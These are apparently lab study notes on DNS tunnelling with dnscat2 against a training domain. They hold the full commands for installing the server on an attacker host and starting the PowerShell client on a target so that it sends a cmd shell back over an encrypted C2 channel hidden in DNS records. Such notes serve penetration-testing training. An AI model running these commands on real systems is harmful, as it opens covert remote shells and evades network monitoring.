Skip to content

DNS Tunneling with Dnscat2

  • tunneling tool that uses the DNS protocol to send data between two hosts
  • uses an encrypted Command & Control - C2 channel and sends data inside the TXT records within the DNS protocol
  • Every AD env has its DNS server. When a local DNS server tries to resolve an address, data is sent over the network instead of a legitimate DNS server.
  • With dnscat2 , the address resolution is requested from an external server.
  • https://github.com/iagox86/dnscat2.git

Workflow:

Set up dnscat2 

    git clone https://github.com/iagox86/dnscat2.git

    cd dnscat2/server/
    sudo gem install bundler
    sudo bundle install

Starting the dnscat2 server - sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache - This will provide a secret key, which we will have to provide to the dnscat2 client for authentication and encryption of data being sent to our external dnscat2 server.

dnscat2 on Target - We can use the client in the folder or use the dnscat2-powershell here client - send the dnscat2.ps1 file to the target host Commands - Import-Module .\dnscat2.ps1 - Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd - tunnel with the server on PWNBox and send a cmd shell - -PreSharedSecret - secret key from the server

Interacting with the session - After the above command, we will get a session with dnscat2> - Convert to cmd - window -i 1 - 2